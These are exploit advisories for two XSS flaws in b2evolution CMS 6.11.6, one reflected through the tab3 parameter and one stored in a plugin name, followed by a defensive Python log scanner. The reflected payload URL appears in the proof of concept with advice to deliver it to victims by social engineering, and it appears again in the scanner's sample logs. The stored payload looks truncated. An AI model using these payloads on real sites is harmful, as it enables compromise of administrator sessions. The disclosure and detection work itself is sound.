# Exploit Title: Reflected XSS in b2evolution CMS 6.11.6 via tab3 parameter in evoadm.php
# CVE : CVE-2020-22839
# Date: 10/02/2021
# Exploit Author: Nakul Ratti, Soham Bakore
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux

Vulnerable File:
--------------------------
http://host/evoadm.php

Vulnerable Issue:
--------------------------
Tab3 parameter has no input validation.

--------------------------Proof of Concept-----------------------
Steps to Reproduce:
1. Send the following URL
   http://HOST/evoadm.php?ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1
   to the logged-in victim using any social engineering technique.
2. When an unsuspecting user with high privileges opens this URL, the XSS is triggered and the malicious JavaScript payload executes in the user's browser.
3. The vulnerable parameter in this case is "tab3".

------

# Exploit Title: b2evolution 6.11.6 - 'plugin name' Stored XSS
# Date: 09/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : CVE-2020-22841

--------------------------Proof of Concept-----------------------
1. Log in with an account having high privileges.
2. Navigate to System -> Plugins and select any plugin.
3. Change the plugin name and enter the following payload "> in the name parameter.
4. The payload gets stored in the database.
5. The payload gets executed after the victim checks the plugin page.
6. This vulnerability needs high privilege and can affect other users with similar privileges.
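
A defender-side check for the reflected tab3 issue (CVE-2020-22839), added here as an example and not taken from the advisory or from b2evolution: it scans web access log lines for requests to evoadm.php whose decoded tab3 value falls outside an allow-list. The allow-list pattern, the function names and the sample log lines (including the value `fullview`) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate tab3 values are short identifiers (letters, digits, "_", "-").
SAFE_TAB = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Request portion of a combined-format access log line: "METHOD target PROTO"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def flag_tab3(log_line):
    """Return the decoded tab3 values in this log line that fail the allow-list."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    if not target.path.endswith("/evoadm.php"):
        return []
    # parse_qs percent-decodes each value, so %22 becomes a literal double quote.
    values = parse_qs(target.query, keep_blank_values=True).get("tab3", [])
    return [v for v in values if not SAFE_TAB.fullmatch(v)]


def scan(lines):
    """Return (line index, offending tab3 values) for every flagged line."""
    return [(i, bad) for i, line in enumerate(lines) if (bad := flag_tab3(line))]


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Feb/2021:10:00:01 +0000] '
    '"GET /evoadm.php?ctrl=comments&tab3=fullview&blog=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Feb/2021:10:02:13 +0000] '
    '"GET /evoadm.php?ctrl=comments&filter=restore'
    '&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 HTTP/1.1" 200 5342',
    '203.0.113.9 - - [10/Feb/2021:10:03:40 +0000] '
    '"GET /index.php?tab3=%22x HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for index, values in scan(SAMPLE_LOG):
        print(f"line {index}: suspicious tab3 value(s): {values}")
```

The same allow-list test can be applied server-side before tab3 is used, alongside HTML-attribute encoding of the value on output.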